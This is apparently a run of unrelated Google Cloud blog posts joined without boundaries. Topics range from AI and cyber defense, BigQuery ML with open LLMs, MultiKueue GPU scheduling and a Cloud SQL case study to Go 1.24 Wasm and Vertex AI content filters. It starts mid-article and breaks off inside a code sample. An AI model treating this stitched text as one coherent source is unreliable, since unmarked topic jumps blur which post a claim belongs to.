While malicious actors work to apply AI capabilities for nefarious purposes, we believe the scales still tip in favor of network defense. Network defenders can use AI capabilities to improve secure software development and deployment practices. Generative AI can help optimize the bandwidth of cyber defenders where the workforce is limited, and implement solutions where defenders are not available.
Continued importance of traditional best practices
As these new technologies are adopted broadly, it is essential to keep in mind the importance of resilience and security best practices.
While we track how threat actors use new technologies such as generative AI, organizations need to shore up defenses against known, longstanding malicious tactics, techniques, and procedures, and to develop risk management strategies accordingly. There is no substitute for a strong foundation based on robust adoption of cybersecurity measures, and support for initiatives that enhance the resilience of digital systems (including uptake of new security technologies, where possible).
Collaboration to drive defense
Collaboration across sectors and stakeholders is critical for defense as well. Countries must work with each other and the private sector on systemic solutions for achieving broader success against malicious cyber activity, as highlighted in our new cybercrime report.
The stakes are high. When hospitals are locked out of critical systems, patient care suffers. When water delivery is disrupted, entire communities are left vulnerable. The effects of cybercrime extend far beyond stolen money or data breaches; they erode public trust, and destabilize essential services. Continued malicious cyberattacks demand strong, collaborative action.
We look forward to continued partnership with customers, governments, and other stakeholders to drive advantages for network defense.
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Next ‘25 can help elevate your cybersecurity skills. Here’s how: From red teaming to tabletop exercises to the SOC Arena, Next ’25 has something for security pros and newcomers alike. Read more.
How Google manages vulnerability detection and remediation: How does Google handle vulnerabilities? Ana Oprea shares core practices behind Google’s vulnerability management program, as part of our new “How Google Does It” series. Read more.
Safeguarding users and strengthening national security: AI holds immense possibilities for cybersecurity — and also economic and national security. We’re offering new recommendations for policymakers, threat research on the adversarial misuse of AI, and insights on the role AI will play in national security, as well as initiatives designed to safeguard users and strengthen cyber defense in the AI era. Read more.
5 ways Google Cloud can help you minimize credential theft risk: Here are five ways to protect your cloud deployments from threat actors exploiting compromised cloud identities. Read more.
Secure-by-design blueprint for a high-assurance web framework: Following years of work in which we’ve reduced the number of critical web vulnerabilities such as XSS in Google applications by more than an order of magnitude, we’re proposing a new, detailed blueprint based on how we created this high-assurance web framework that almost completely eliminates exploitable web vulnerabilities. Read more.
Our 2024 Responsible AI report: Our sixth annual Responsible AI Progress Report details how we govern, map, measure, and manage AI risk throughout the AI development lifecycle. The report highlights the progress we have made over the past year building governance structures for our AI product launches. Read more.
$15 million to support hands-on cybersecurity education: Google.org is announcing support for universities across Europe, the Middle East and Africa that will help expand access to cybersecurity education for thousands of students. Read more.
The paradox of more tools, but less security: Discover the key findings of Google’s global security study of more than 2,000 IT and security professionals at our March 6 webinar with Google security experts. Register here.
Please visit the Google Cloud blog for more security stories published this month.
Threat Intelligence news
Cybercrime, the multifaceted national security threat: In this report, Google Threat Intelligence Group (GTIG) discusses the current state of cybercrime, emphasizing why these attacks must be considered a national security threat. We also share our approach for tackling this challenge. Read more.
Adversarial misuse of generative AI: GTIG reports on how advanced persistent threat and coordinated information operations actors are attempting to misuse Gemini. Read more.
ScatterBrain and the unmasking of PoisonPlug’s obfuscator: China-nexus threat actors are evading detection and analysis by using a backdoor that employs a custom obfuscating compiler we call ScatterBrain. Read more.
Exploring third-party installer abuse in CVE-2023-6080: Building upon the insights shared in a previous Mandiant blog post, this case study explores the ongoing challenge of securing third-party Windows installers. Read more.
Using capa rules for Android malware detection: To combat new security challenges, the Android Security and Privacy Team has partnered with Mandiant FLARE to extend the open-source binary analysis tool capa to analyze native ARM ELF files targeting Android systems. Read more.
Strategic threat intelligence for financial institutions: We recently shared insights from Google Threat Intelligence at a webinar for financial institutions, including on threat actors, malicious campaigns, malware, and exploited CVEs. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Google Cloud Security and Mandiant podcasts
Everything you were afraid to ask about cloud security surprises: Or Brokman, strategic Google Cloud engineer, talks about common cloud security mistakes and why they keep happening, with hosts Anton Chuvakin and Tim Peacock. Listen here.
Navigating the new security landscape with ‘virtual’ cloud CISOs: Beth Cartier, former CISO, vCISO, and founder of Initiative Security, explores AI, cybersecurity, resilience, and whether today’s organizations are addressing all three properly, with Anton and guest host Marina Kaganovich. Listen here.
Defender’s Advantage: Agentic AI in cybersecurity: Steph Hay, senior director, Gemini Product and UX, Google Cloud Security, joins host Luke McNamara to discuss agentic AI and its implications for security disciplines. Listen here.
Behind the Binary: Shaping the world of reverse engineering: Security researcher Saumil Shah discusses the evolution of reverse engineering tools and techniques, shares insights on the importance of continuous learning, and why he started his own security conference. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in February with more security-related updates from Google Cloud.
BigQuery Machine Learning allows you to use large language models (LLMs), like Gemini, to perform tasks such as entity extraction, sentiment analysis, translation, text generation, and more on your data using familiar SQL syntax.
Today, we are extending this capability with support for any open-source LLM from the Vertex AI Model Garden — including any models you deploy from Hugging Face and including OSS models you might have tuned. This greatly expands the model choice available to developers.
In this post, we use the Meta Llama 3.3 70B model to illustrate how this integration works. However, you can use any of 170K+ text generation models available on Hugging Face by following the same steps. We’ve also got a tutorial notebook ready for you, or you can jump right into the steps below.
Using Open-Source Software (OSS) models with BigQuery ML
1. Host the model on a Vertex endpoint
First, choose a text-generation model from Hugging Face. Then, navigate to Vertex AI Model Garden > Deploy from Hugging Face. Enter the model URL and, optionally, modify the endpoint name, deployment region, and machine spec for the deployment endpoint.
Alternatively, you can search for ‘Llama 3.3’ from the Vertex AI Model Garden UI, accept the terms, and deploy the model endpoint. You can also do this step programmatically (see the tutorial notebook here).
Note: To use Llama models, you need to agree to the Llama 3.3 Community License Agreement on the Llama 3.3 model card on Hugging Face, or accept the terms in the Vertex AI Model Garden UI. You must complete this step before deploying the model.
2. Create a remote model in BigQuery
Model deployment takes several minutes. After the deployment is complete, create a remote model in BigQuery using a SQL statement like the following:
```sql
CREATE OR REPLACE MODEL bqml_tutorial.llama_3_3_70b
REMOTE WITH CONNECTION `LOCATION.CONNECTION_ID`
OPTIONS
(endpoint='https://<region>-aiplatform.googleapis.com/v1/projects/<project_name>/locations/<region>/endpoints/<endpoint_id>'
)
```
To allow BigQuery to connect to the remote endpoint, you need to provide a connection. If you don’t already have one, you can create it by following the instructions here. Replace the placeholder endpoint in the code sample above with your endpoint URL. You can find the endpoint_id in the console under Vertex AI > Online Prediction > Endpoints > Sample Request.
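The endpoint option is simply the regional Vertex AI online-prediction URL with your project, region, and endpoint ID substituted in. A small helper makes the substitution explicit (the project and endpoint values below are placeholders):

```python
def vertex_endpoint_url(region: str, project: str, endpoint_id: str) -> str:
    """Build the Vertex AI online-prediction endpoint URL used in the
    CREATE MODEL statement's `endpoint` option."""
    return (
        f"https://{region}-aiplatform.googleapis.com/v1/"
        f"projects/{project}/locations/{region}/endpoints/{endpoint_id}"
    )

# Placeholder values for illustration only.
print(vertex_endpoint_url("us-central1", "my-project", "1234567890"))
```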
3. Perform inference
You are now ready to perform inference against this model from BigQuery ML. For this scenario, take this medical transcripts dataset as an example. It contains unstructured, varied raw transcripts capturing the history, diagnosis, and treatment of patients visiting a medical facility. A sample transcript looks like the image below:
Create a table
To analyze this data in BigQuery, first create a table.
```sql
LOAD DATA OVERWRITE bqml_tutorial.medical_transcript
FROM FILES(
  format='NEWLINE_DELIMITED_JSON',
  uris = ['gs://cloud-samples-data/vertex-ai/model-evaluation/peft_eval_sample.jsonl']
)
```
Perform inference
You can now use your Llama model to extract structured data from the unstructured transcripts in your table. Say you want to extract the patient’s age, gender and list of diseases for each entry. You can do so with a SQL statement like the following and save the derived insights to a table. Include the information you want to extract and its schema in the model prompt.
```sql
CREATE TEMP FUNCTION ExtractOutput(s STRING)
RETURNS STRING
AS (
  SUBSTR(s, INSTR(s, "Output:")+8)
);

CREATE OR REPLACE TABLE bqml_tutorial.medical_transcript_analysis_results AS (
SELECT
  ExtractOutput(ml_generate_text_llm_result) AS generated_text,
  * EXCEPT(ml_generate_text_llm_result)
FROM
  ML.GENERATE_TEXT( MODEL `bqml_tutorial.llama_3_3_70b`,
    (
      SELECT
        CONCAT('Extract the Gender, Age (in years), and Disease information from the following medical transcript. Return **only** a JSON in the following schema: \n{ "Age": Int, "Gender": "String", "Disease": ["String"]}. If Age, Gender, or Disease information is not found, return `null` for that field. Summarize the disease(s) in 1 to 5 words. If the patient has multiple diseases, include them in a comma-separated list within the "Disease" field. Do not include any other text or labels in your response.**. \n', input_text) AS prompt
      FROM
        bqml_tutorial.medical_transcript
    ),
    STRUCT(
      0 AS temperature,
      0.001 AS top_p,
      1 AS top_k,
      128 AS max_output_tokens,
      TRUE AS flatten_json_output))
);

SELECT * FROM bqml_tutorial.medical_transcript_analysis_results;
```
The output returned from this Llama endpoint includes the input prompt, so we also wrote an ExtractOutput function to help parse the output. The output table, with the results in the 'generated_text' column, is as follows:
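The ExtractOutput logic relies on SQL's 1-based SUBSTR/INSTR semantics: INSTR finds the position of the literal "Output:", and adding 8 skips those seven characters plus the space that follows. The same logic in Python, for illustration:

```python
def extract_output(s: str) -> str:
    """Python equivalent of the SQL ExtractOutput temp function:
    return everything after the literal "Output: " marker."""
    idx = s.find("Output:")
    # SUBSTR(s, INSTR(s, "Output:") + 8) in 1-based SQL maps to
    # slicing from idx + 8 in 0-based Python: past "Output:" and the space.
    return s[idx + 8:]

raw = 'Prompt text ... Output: {"Age": 34, "Gender": "Female"}'
print(extract_output(raw))
```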
Perform analytics on results
You can now perform all sorts of analytics on this data. For example, you can answer "What are the most common diseases in females aged 30+ in our sample?" with a simple SQL query. You can see that 'Hypertension', 'Arthritis', and 'Hyperlipidemia' are the most common.
```sql
WITH
  parsed_data AS (
    SELECT
      JSON_EXTRACT_SCALAR(generated_text, '$.Gender') AS gender,
      CAST(JSON_EXTRACT_SCALAR(generated_text, '$.Age') AS INT64) AS age,
      JSON_EXTRACT_ARRAY(generated_text, '$.Disease') AS diseases
    FROM
      bqml_tutorial.medical_transcript_analysis_results)

SELECT
  disease,
  COUNT(*) AS occurrence
FROM
  parsed_data, UNNEST(diseases) AS disease
WHERE
  LOWER(gender) = 'female'
  AND age >= 30
GROUP BY
  disease
ORDER BY
  occurrence DESC
LIMIT 3;
```
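If you want to sanity-check the aggregation logic outside BigQuery, the same filter-and-count can be expressed over parsed rows in Python (the sample rows below are made up for illustration):

```python
import json
from collections import Counter

# Hypothetical rows mirroring the JSON in the `generated_text` column.
rows = [
    '{"Age": 45, "Gender": "Female", "Disease": ["Hypertension", "Arthritis"]}',
    '{"Age": 34, "Gender": "Female", "Disease": ["Hypertension"]}',
    '{"Age": 29, "Gender": "Female", "Disease": ["Asthma"]}',
    '{"Age": 52, "Gender": "Male", "Disease": ["Hyperlipidemia"]}',
]

counts = Counter()
for raw in rows:
    record = json.loads(raw)
    # Same filter as the SQL: females aged 30 or older.
    if record["Gender"].lower() == "female" and record["Age"] >= 30:
        counts.update(record["Disease"])

print(counts.most_common(3))
```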
Get started today
Try out BigQuery with your own preferred open model or a tuned/distilled model with the BigQuery and Vertex Model Garden integration today. Learn more in our documentation.
The AI revolution isn’t just about large language models (LLMs) – it’s about building real-world solutions that change the way you work. Google’s global AI roadshow offers an immersive experience that’s designed to empower you, the developer, to push the boundaries of what’s possible with AI. The global roadshow is a hands-on event. Forget the abstract concepts; we’re diving into code, deployment, and complex architectures.
Across the globe, we’re hosting dynamic events to provide practical, code-level engagement with Google’s most advanced AI technologies. These events will show you how to leverage everything from Google’s cloud infrastructure to the latest Gemini 2.0 models. Whether you’re a seasoned engineer looking to optimize your system, a developer seeking to build cutting-edge applications, or a startup founder ready to innovate, this roadshow is your direct line to the future of AI development.
Unlocking the power of AI: What awaits you
This global roadshow is structured to provide both foundational knowledge and specialized deep dives. We’re tailoring each event to address the specific needs and interests of our global community. Our roadshow covers the core pillars of modern AI development:
Cloud infrastructure for AI: Gain expertise in leveraging Google Cloud to build, deploy, and scale AI solutions. Learn how services like Cloud Run provide the bedrock for flexible and robust AI applications.
Advanced generative models: Master the use of powerful LLMs such as Gemini 2.0. Dive into techniques for integrating them into a variety of workflows, from real-time voice and video applications to advanced search capabilities and image or video object detection.
Responsible AI development: Learn how to utilize robust evaluation frameworks to build safe and trustworthy AI solutions. Understand how to mitigate challenges such as hallucinations, outdated information, and chaotic output formats.
Multi-agent systems: Discover the complexities of building systems with interactive AI agents. Gain practical experience in architecting dynamic and responsive AI workflows that are uniquely tailored to your specific needs.
Why this roadshow is a must-attend
You can access and grow your AI opportunities:
Deep technical content: Go beyond surface-level knowledge with in-depth sessions led by Google’s experts.
Practical hands-on experience: Gain real-world skills through interactive workshops and hands-on labs – bring your laptop and dive in!
Networking with peers: Connect and collaborate with a global community of AI innovators and experts.
Cutting-edge tech: Stay at the forefront of the AI revolution and discover the latest advancements in Google’s AI ecosystem.
Ready to transform your AI journey?
Work with the tools, gain the expertise, and join the conversation that’s shaping the future of AI. Don’t just witness the AI revolution – lead it. Find your closest event and secure your spot today!
Is your laptop starting to collect a bit of dust, slowing down, or just not acting the same as it used to? This Valentine’s day, you have an opportunity to give it the gift of a fresh start with ChromeOS Flex.
Think of ChromeOS Flex as your cupid, ready to rekindle the spark with your aging hardware. It’s Google’s no-cost, cloud-based operating system, designed to breathe new life into older PCs and Macs. Whether you’re already seeing performance decline, or you may even be ineligible for the upcoming Windows 11 upgrade, ChromeOS Flex can help modernize your device in minutes – all without breaking the bank. Sounds like true love, right?
So, what is ChromeOS Flex?
ChromeOS Flex is similar to the operating system found on Chromebooks, known for its speed, simplicity, and security. However, it’s tailored for installation on devices that weren’t designed for ChromeOS. You can take your existing Mac or PC, which may have become sluggish over time, and make it speedier, more user friendly, and more secure. In fact, there are plenty of reasons to fall in love with ChromeOS Flex:
Speed: Remember waiting ages for your old computer to start up? ChromeOS Flex boots up in seconds, letting you get started quickly.
Security: ChromeOS Flex comes with built-in security features, protecting you from the latest malware, viruses, and other online threats.
Sustainability: Instead of throwing away your old device, you can give it a new lease on life. It’s the environmentally friendly way to show your tech some love.
Free: That’s right–ChromeOS Flex is free to install. It really is the gift that keeps on giving.
Ready to Flex? It’s just a few steps:
Check compatibility: First, make sure your device is compatible (it probably is). Google has a list of over 600 certified devices here.
Create the installer: Use the Chromebook Recovery Utility extension for Chrome to create a bootable ChromeOS Flex installer on a USB drive (8 GB or larger).
Boot from the USB drive: Insert the USB drive into your laptop, power it on, and use your boot key to boot from the USB drive.
Install ChromeOS Flex: The rest is easy! Just follow the on-screen instructions to install ChromeOS Flex on your computer.
This Valentine’s day, give your old laptop a new lease on life with ChromeOS Flex. It’s the perfect way to show your tech some love, without breaking the bank or contributing to e-waste. And who knows, you might just fall in love with your old computer all over again!
Artificial Intelligence (AI) and large language models (LLMs) are experiencing explosive growth, powering applications from machine translation to artistic creation. These technologies rely on intensive computations that require specialized hardware resources, like GPUs. But access to GPUs can be challenging, both in terms of availability and cost.
For Google Cloud users, the introduction of Dynamic Workload Scheduler (DWS) transformed how you can access and use GPU resources, particularly within a Google Kubernetes Engine (GKE) cluster. Dynamic Workload Scheduler optimizes AI/ML resource access and spending by simultaneously scheduling necessary accelerators like TPUs and GPUs across various Google Cloud services, improving the performance of training and fine-tuning jobs.
But what if you want to deploy your workload in any available region, as soon as possible, as soon as DWS provides you the resources your workload needs?
This is where MultiKueue, a Kueue feature, comes into play. With MultiKueue, GKE, and Dynamic Workload Scheduler, you can wait for accelerators in multiple regions. Dynamic Workload Scheduler automatically provisions resources in the best GKE clusters as soon as they are available. By submitting workloads to a global queue, MultiKueue executes them in the region with available GPU resources, helping to optimize global resource usage, lowering costs, and speeding up processing.
MultiKueue
MultiKueue enables workload distribution across multiple GKE clusters in different regions. By identifying clusters with available resources, MultiKueue simplifies the process of dispatching jobs to the optimal location.
Dynamic Workload Scheduler is supported on GKE Autopilot (version 1.30.3 and later), our managed Kubernetes mode that automatically handles the provisioning, scaling, security, and maintenance of your container infrastructure. Let’s take a deeper look at how to set up and manage MultiKueue with Dynamic Workload Scheduler, so you can obtain GPU resources faster.
MultiKueue cluster roles
MultiKueue provides two distinct cluster roles:
Manager cluster – Establishes and maintains the connection with the worker clusters, and creates and monitors remote objects (workloads or jobs) while keeping the local ones in sync.
Worker cluster – A simple standalone Kueue cluster that executes the jobs submitted by the manager cluster.
Creating a MultiKueue cluster
In this example we create four GKE Autopilot clusters:
One manager cluster in europe-west4
Three worker clusters in
europe-west4
us-east4
asia-southeast1
Let’s take a look at how this works in the following step-by-step example. You can access the files for this example in this github repository.
The setup in the repository does two things:
Configures the connection between the manager cluster and the worker clusters
Configures Kueue in the worker clusters
GKE clusters, Kueue with MultiKueue, and DWS are now configured and ready to use. Once you submit your jobs, the Kueue manager distributes them across the three worker clusters.
In the dws-multi-worker.yaml file, you’ll find the Kueue configuration for the worker clusters, including the manager configuration.
The following script provides a basic example of how to set up the MultiKueue AdmissionCheck with three worker clusters.
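A sketch of what that AdmissionCheck configuration can look like, assuming worker cluster and kubeconfig secret names chosen for this example (see the Kueue MultiKueue documentation for the full setup, including creating a kubeconfig secret per worker):

```yaml
apiVersion: kueue.x-k8s.io/v1beta1
kind: AdmissionCheck
metadata:
  name: dws-multikueue
spec:
  controllerName: kueue.x-k8s.io/multikueue
  parameters:
    apiGroup: kueue.x-k8s.io
    kind: MultiKueueConfig
    name: dws-multikueue-config
---
apiVersion: kueue.x-k8s.io/v1beta1
kind: MultiKueueConfig
metadata:
  name: dws-multikueue-config
spec:
  clusters:
  - worker-europe-west4
  - worker-us-east4
  - worker-asia-southeast1
---
# One MultiKueueCluster per worker; each references a secret holding
# the kubeconfig used to reach that cluster (shown for one worker here).
apiVersion: kueue.x-k8s.io/v1beta1
kind: MultiKueueCluster
metadata:
  name: worker-europe-west4
spec:
  kubeConfig:
    locationType: Secret
    location: worker-europe-west4-kubeconfig
```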
So that’s how you can leverage MultiKueue, GKE, and DWS to streamline global job execution, optimize speed, and eliminate the need for manual node management!
This setup also addresses the needs of those with data residency requirements, allowing you to dedicate subsets of clusters for different workloads and ensure compliance.
To further enhance your setup, you can leverage advanced Kueue features like team management with local queues or workload priority classes. Additionally, you can gain valuable insights by creating a Grafana or Cloud Monitoring dashboard that uses Kueue metrics, which are automatically collected by Google Managed Service for Prometheus via PodMonitoring resources.
In today’s dynamic digital landscape, building and operating secure, reliable, cost-efficient and high-performing cloud solutions is no easy feat. Enterprises grapple with the complexities of cloud adoption, and often struggle to bridge the gap between business needs, technical implementation, and operational readiness. This is where the Google Cloud Architecture Framework comes in. The framework provides comprehensive guidance to help you design, develop, deploy, and operate efficient, secure, resilient, high-performing, and cost-effective Google Cloud topologies that support your security and compliance requirements.
Who should use the Architecture Framework?
The Architecture Framework caters to a broad spectrum of cloud professionals. Cloud architects, developers, IT administrators, decision makers and other practitioners can benefit from years of subject-matter expertise and knowledge both from within Google and from the industry. The framework distills this vast expertise and presents it as an easy-to-consume set of recommendations.
The recommendations in the Architecture Framework are organized under five business-focused pillars.
We recently revamped the guidance in all the pillars and perspectives of the Architecture Framework to center the recommendations around a core set of design principles.
In addition to the above pillars, the Architecture Framework provides cross-pillar perspectives that present recommendations for selected domains, industries, and technologies like AI and machine learning (ML).
Benefits of adopting the Architecture Framework
The Architecture Framework is much more than a collection of design and operational recommendations. The framework empowers you with a structured, principles-oriented design methodology that unlocks many advantages:
Enhanced security, privacy, and compliance: Security is paramount in the cloud. The Architecture Framework incorporates industry-leading security practices, helping ensure that your cloud architecture meets your security, privacy, and compliance requirements.
Optimized cost: The Architecture Framework lets you build and operate cost-efficient cloud solutions by promoting a cost-aware culture, focusing on resource optimization, and leveraging built-in cost-saving features in Google Cloud.
Resilience, scalability, and flexibility: As your business needs evolve, the Architecture Framework helps you design cloud deployments that can scale to accommodate changing demands, remain highly available, and be resilient to disasters and failures.
Operational excellence: The Architecture Framework promotes operationally sound architectures that are easy to operate, monitor, and maintain.
Predictable and workload-specific performance: The Architecture Framework offers guidance to help you build, deploy, and operate workloads that provide predictable performance based on your workloads’ needs.
Embrace the Architecture Framework to transform your Google Cloud journey, and get comprehensive guidance on security, reliability, cost, performance, and operations — as well as targeted recommendations for specific industries and domains like AI and ML. To learn more, visit Google Cloud Architecture Framework.
When most people think of São Paulo, business and culture usually come to mind, not beef and chicken. But the state of São Paulo isn’t only home to the largest city in the hemisphere — it’s also the second largest producer of meat in a country that’s the second largest agricultural exporter in the world. Given the importance of agribusiness to Brazil’s economy, the Secretariat of Agriculture and Supply of the State of São Paulo (SAA-SP) plays a fundamental role in the development of agribusiness across the region and, by extension, the country.
With the mission of promoting the sustainable production of food, fibers and bioenergy, SAA-SP offers support to rural producers in several areas, such as technical assistance, research, agricultural defense, and access to markets. The Secretariat is also responsible for ensuring food security for the population, monitoring the quality of agricultural products and promoting nutritional education actions.
As the world’s food systems have evolved and grown more complex, organizations have looked to technology to help meet the goals for food security and sustainability. In the case of SAA-SP, the secretariat needs to securely manage increasing amounts of confidential data and ensure its critical systems are available 24/7. These systems include the Rural Environmental Registry (a mandatory electronic registry for all rural properties), and GEDAVE (a management system for animal and plant monitoring).
To give a sense of just how complex the system is, consider one example: GEDAVE handles controls for the management of poultry production, whereby each chick must be transferred to a new location within 24 hours of birth, and the entire process must be rigorously documented to ensure food safety.
To meet the needs not only of its aging IT infrastructure but also those of a growing global population that depends on safe, reliable food sources, SAA-SP knew it was time to modernize some of its most important systems.
The growing pains:
Our team in the Department of Systems Management sits within the Information Technology Coordination organization of the SAA-SP. We’re in charge of operating GEDAVE, which is a crucial system for SAA-SP that’s responsible for controlling and monitoring animal and plant health throughout the state of São Paulo.
GEDAVE records and manages data on animal movement, plant production, use of pesticides, vaccination, pest and disease control, among other information relevant to São Paulo’s agriculture. GEDAVE assists in issuing documents such as the Animal Transit Guide (GTA) and the Phytosanitary Certificate of Origin (CFO), which are essential for the trade of agricultural products.
GEDAVE’s back-end was developed in Java and connected to a SQL Server database. It contains sensitive information about rural producers, such as production data, management strategies, and financial information. Previously, this database was hosted on-premises, which caused a series of issues, including:
Difficulty in keeping the database up to date: Applying patches and security updates in the on-premises environment required time and planning, resulting in periods of system unavailability, directly impacting producers who depend on SAA-SP services.
Complexity in performing regular backups: Ensuring data security with regular and reliable backups was a complex and laborious process in the on-premises environment.
Challenging high availability: Maintaining high availability of the on-premises database required investments in redundant and complex infrastructure, increasing management costs and complexity.
In addition, SAA-SP needed to ensure the 24/7 availability of these systems to help producers meet market demands, including such complex issues as quality control for export and monitoring internal production.
Data security was also crucial, as information on types of herds, vaccination strategies, pest control, among others, is highly sensitive and requires rigorous protection.
Sowing the seeds of innovation:
SAA-SP decided to modernize its data infrastructure to address these challenges, choosing Google Cloud. They felt the Google Cloud platform’s high performance could ensure application availability and efficiency, while its ease of management would simplify database administration and allow the IT team to focus on other priorities.
As a first step in this modernization, SAA-SP migrated its SQL Server database to Cloud SQL for SQL Server on Google Cloud. A crucial factor in the choice was the ease of enabling high availability (HA) in Cloud SQL for SQL Server. With just a few clicks, SAA-SP configured automatic database replication and failover, ensuring service continuity in the event of failures and compliance with SLAs, without the need for complex configurations. In addition, the migration to Cloud SQL for SQL Server was carried out quickly and easily, minimizing the impact on SAA-SP’s operations.
This strategic change brought a series of benefits, allowing Java applications to connect to a more modern, scalable and secure database environment.
Harvesting success:
Simplified updates: Cloud SQL for SQL Server makes it easier to apply patches and updates, minimizing downtime and ensuring that systems are always protected with the latest versions of the software.
Automated backups: The service offers automated and managed backups, ensuring data security and recovery in the event of failures.
Simplified high availability: The simplified configuration of high availability in Cloud SQL for SQL Server reduced the effort of the IT team and ensured compliance with service SLAs.
Enhanced security: With data encryption at rest and in transit, Cloud SQL for SQL Server protects SAA-SP’s confidential information from unauthorized access.
On-demand scalability: SAA-SP can adjust Cloud SQL for SQL Server resources according to demand, ensuring optimal performance of Java applications, even during peak periods.
Focus on innovation: SAA-SP’s IT team can now focus on strategic projects, such as developing new features for Java applications, instead of worrying about managing the data infrastructure.
Reduced IT costs: The migration to Cloud SQL for SQL Server eliminated the need to invest in hardware and software to maintain the on-premises database, reducing operational costs.
Cultivating a future of innovation in agriculture with Cloud SQL for SQL Server:
The migration to Cloud SQL for SQL Server was a strategic decision that allowed SAA-SP to overcome the challenges of on-premises data management and ensure the availability, security, and scalability of its critical systems. The ease of enabling high availability and the simplicity of the migration were determining factors for the success of the project.
But more than that, Cloud SQL enabled innovation at SAA-SP, opening doors to integration with generative AI for more assertive and efficient analysis and decision-making. For example, SAA-SP is leveraging the power of Gemini with Looker to provide C-level executives with real-time data insights hosted on Cloud SQL, facilitating data-driven decisions.
Furthermore, SAA-SP is empowering its customers with Gemini in Databases, allowing them to harness AI to enhance database performance and maintenance.
SAA-SP plans to continue modernizing its infrastructure and services, undertaking:
Migration to microservices: Launch an updated version of the microservices-based application to increase the flexibility, scalability and capacity of the system.
Data analysis with generative AI: Enable the use of generative AI to perform predictive analysis and obtain real-time insights from Cloud SQL for SQL Server data, assisting in strategic decision-making for the agricultural sector.
Data management with Gemini: Use Gemini to facilitate data management and analysis, extracting relevant information and simplifying access to complex data.
SAA-SP’s move toward intelligent management of operations, coupled with these advancements in analysis, has consolidated its position as a leader in technology and innovation in the agricultural sector, driving the development of agribusiness across São Paulo and serving as a beacon for others around the world.
Get Started:
Discover how Cloud SQL for SQL Server can enhance your application performance and ensure uninterrupted availability.
Read more on how others like Ford and Visual Research are modernizing their workloads with Cloud SQL for SQL Server, resulting in high performance and cost reduction.
Earlier this week, we released Go 1.24, the latest version of Google’s open-source programming language for productively building scalable, production-ready backend and cloud-based systems.
There’s a lot to love about Go 1.24, including support for post-quantum cryptography, a weak pointer implementation, and substantial performance improvements to the Go runtime. Go 1.24 also significantly expands its capabilities for WebAssembly (Wasm), a binary instruction format that provides for the execution of high-performance, low-level code at speeds approaching native performance. With a new `go:wasmexport` compiler directive and the ability to build a reactor for the WebAssembly System Interface (WASI), developers can now export functions from their Go code to Wasm — including in long-running applications — fostering deeper integrations with Wasm hosts and unlocking new possibilities for Go-based Wasm applications.
These additions represent a significant step forward in Go’s Wasm story. For some types of applications, like those running at the edge, Wasm is critical to serving performance-critical use cases. Now, developers can leverage Go’s signature capabilities to ensure that these use cases are also scalable, secure, and production-ready.
How does it work?
Go first added support for compiling to Wasm in Go 1.11 via the `js/wasm` port, and added a new port for the WASI preview 1 syscall API in Go 1.21. Now, with Go 1.24, the new `go:wasmexport` compiler directive makes Go functions accessible to a Wasm host, enabling the host to call into a Go application like a plugin or other extension mechanism. And, with the new WASI reactor build flag, a Go application remains live after its initialization function finishes, helping to ensure that exported functions remain callable without requiring reinitialization — an important feature in long-running applications or services.
For more details, be sure to check out this post from the Go blog and read more in the Go docs.
Run Wasm at the edge with Google Cloud
Starting today, you can run Go-compiled Wasm plugins for applications built on Google Cloud at the edge. To do so, you need to leverage Service Extensions with Google Cloud’s Application Load Balancers. Service Extensions allows you to run your own custom code directly in the request/response path in a fully managed Google environment with optimal latency, so you can customize load balancers to meet your business requirements. All you need to do is provide the code — Google Cloud manages the rest.
To get started with Service Extensions plugins and Go, take a look at our growing samples repository with a local testing toolkit and follow our quickstart guide in the documentation.
As organizations rush to adopt generative AI-driven chatbots and agents, it’s important to reduce the risk of exposure to threat actors who force AI models to create harmful content.
We want to highlight two powerful capabilities of Vertex AI that can help manage this risk — content filters and system instructions. Today, we’ll show how you can use them to ensure consistent and trustworthy interactions.
Content filters: Post-response defenses
By analyzing generated text and blocking responses that trigger specific criteria, content filters can help block the output of harmful content. They function independently from Gemini models as part of a layered defense against threat actors who attempt to jailbreak the model.
Gemini models on Vertex AI use two types of content filters:
Non-configurable safety filters automatically block outputs containing prohibited content, such as child sexual abuse material (CSAM) and personally identifiable information (PII).
Configurable content filters allow you to define blocking thresholds in four harm categories (hate speech, harassment, sexually explicit, and dangerous content) based on probability and severity scores. These filters are off by default, but you can configure them according to your needs.
It’s important to note that, like any automated system, these filters can occasionally produce false positives, incorrectly flagging benign content. This can negatively impact user experience, particularly in conversational settings. System instructions (below) can help mitigate some of these limitations.
System instructions: Proactive model steering for custom safety
System instructions for Gemini models in Vertex AI provide direct guidance to the model on how to behave and what type of content to generate. By providing specific instructions, you can proactively steer the model away from generating undesirable content to meet your organization’s unique needs.
You can craft system instructions to define content safety guidelines, such as prohibited and sensitive topics, and disclaimer language, as well as brand safety guidelines to ensure the model’s outputs align with your brand’s voice, tone, values, and target audience.
System instructions have the following advantages over content filters:
You can define specific harms and topics you want to avoid, so you’re not restricted to a small set of categories.
You can be prescriptive and detailed. For example, instead of just saying “avoid nudity,” you can define what you mean by nudity in your cultural context and outline allowed exceptions.
You can iterate instructions to meet your needs. For example, if you notice that the instruction “avoid dangerous content” leads to the model being excessively cautious or avoiding a wider range of topics than intended, you can make the instruction more specific, such as “don’t generate violent content” or “avoid discussion of illegal drug use.”
However, system instructions have the following limitations:
They are theoretically more susceptible to zero-shot and other complex jailbreak techniques.
They can cause the model to be overly cautious on borderline topics.
In some situations, a complex system instruction for safety may inadvertently impact overall output quality.
We recommend using both content filters and system instructions.
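As a concrete illustration of combining the two, a single Vertex AI `generateContent` request body can carry both a system instruction and configurable safety thresholds. This is a minimal sketch: the field and enum names follow the public REST API, but the prompt, instruction text, and shared threshold are placeholder example values.

```python
# Illustrative sketch: building a generateContent request body that combines
# both defenses. The instruction text and threshold here are example values.

# The four configurable harm categories described above.
HARM_CATEGORIES = [
    "HARM_CATEGORY_HATE_SPEECH",
    "HARM_CATEGORY_HARASSMENT",
    "HARM_CATEGORY_SEXUALLY_EXPLICIT",
    "HARM_CATEGORY_DANGEROUS_CONTENT",
]

def build_request(prompt: str, system_instruction: str,
                  threshold: str = "BLOCK_MEDIUM_AND_ABOVE") -> dict:
    """Return a request body with both a system instruction and safety settings."""
    return {
        "contents": [{"role": "user", "parts": [{"text": prompt}]}],
        # Proactive steering: tell the model what it may and may not produce.
        "systemInstruction": {"parts": [{"text": system_instruction}]},
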